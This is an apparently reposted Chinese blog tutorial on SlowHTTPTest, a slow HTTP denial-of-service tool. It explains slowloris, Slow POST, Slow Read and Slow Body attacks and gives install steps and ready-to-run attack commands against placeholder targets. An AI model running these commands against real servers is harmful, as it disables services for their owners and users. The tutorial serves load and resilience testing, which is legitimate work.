SlowHTTPTest-慢速DoS攻击

最新推荐文章于 2024-08-09 07:16:40 发布

weixin_34202952

最新推荐文章于 2024-08-09 07:16:40 发布

阅读量568

点赞数

文章标签：操作系统

原文链接：http://www.cnblogs.com/daoyi/p/SlowHTTPTestman-suDoS-gong-ji.html

版权

Slowhttptest是一个依赖于实际HTTP协议的Slow HTTP DoS攻击工具，它的设计原理是要求服务器所有请求被完全接收后再进行处理。

SlowHTTPTest是一款对服务器进行慢攻击的测试软件，所谓的慢攻击就是相对于cc或者DDoS的快而言的，并不是只有量大速度快才能把服务器搞挂，使用慢攻击有时候也能到达同一效果。slowhttptest包含了之前几种慢攻击的攻击方式，包括slowloris, Slow HTTP POST, Slow Read attack等。那么这些慢攻击工具的原理就是想办法让服务器等待，当服务器在保持连接等待时，自然就消耗了资源。

Slowhttptest的源码托管在Github：https://github.com/shekyan/slowhttptest

在Kali Linux上安装SlowHTTPTest

# apt-get install slowhttptest

如果你使用其他linux发行版，可以从源码编译安装：

$ ./configure
$ make
$ sudo make install

使用示例

man手册：

# man slowhttptest

帮助信息中提供了很多使用示例。

slowloris模式：

# slowhttptest -c 1000 -H -i 10 -r 200 -t GET -u https://yourtarget.com/index.html -x 24 -p 3

生成图表(CSV和html格式)：

slowhttptest -c 1000 -H -g -o my_header_stats -i 10 -r 200 -t GET -u https://yourtarget.com/index.html -x 24 -p 3

Slow Read模式：

# slowhttptest -c 1000 -X -r 1000 -w 10 -y 20 -n 5 -z 32 -u http://yourtarget.com -p 5 -l 350 -e x.x.x.x:8080

x.x.x.x:8080是HTTP代理

实际测试

Slow Body攻击：

# slowhttptest -c 1000 -B -g -o my_body_stats -i 110 -r 200 -s 8192 -t FAKEVERB -u http://www.mywebsite.com -x 10 -p 3

攻击开始，服务器端在几秒内的变化：

转载于:https://www.cnblogs.com/daoyi/p/SlowHTTPTestman-suDoS-gong-ji.html

weixin_34202952

关注

0
点赞
踩
4

收藏

觉得还不错? 一键收藏
0
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫